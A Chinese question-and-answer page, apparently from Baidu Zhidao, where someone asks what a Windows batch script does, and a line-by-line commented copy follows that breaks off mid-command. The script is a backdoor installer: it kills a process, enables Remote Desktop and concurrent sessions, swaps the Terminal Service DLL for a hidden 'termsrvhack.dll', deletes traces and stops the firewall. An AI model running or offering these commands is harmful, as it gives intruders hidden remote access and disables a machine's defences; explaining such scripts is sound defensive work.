高手帮我看看这个是什么命令啊

来源:百度知道 编辑:UC知道 时间:2024/06/16 11:23:45
@echo off
@ntsd -c q -p 844
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@del c:\3389.txt
@net stop sharedaccess
@net start dcomlaunch
@net start termservice

@echo off
rem 关闭回显
@ntsd -c q -p 844
rem 杀掉pid号为844的进程。pid号不是随机产生的么?是想要杀杀
rem 毒软件吧?显然不行,除非运气好到中5百万......
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
rem 保证切换系统用户帐号后,先前已经建立好的宽带拨号连接不会rem 自行断开。
:::::::::::::为开远程桌面连接服务做准备::::::::::::::::
::{
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
::}
:::::::::::::为开远程桌面连接服务做准备::::::::::::::::
@copy c:\termsrvhack.dll c:\windows\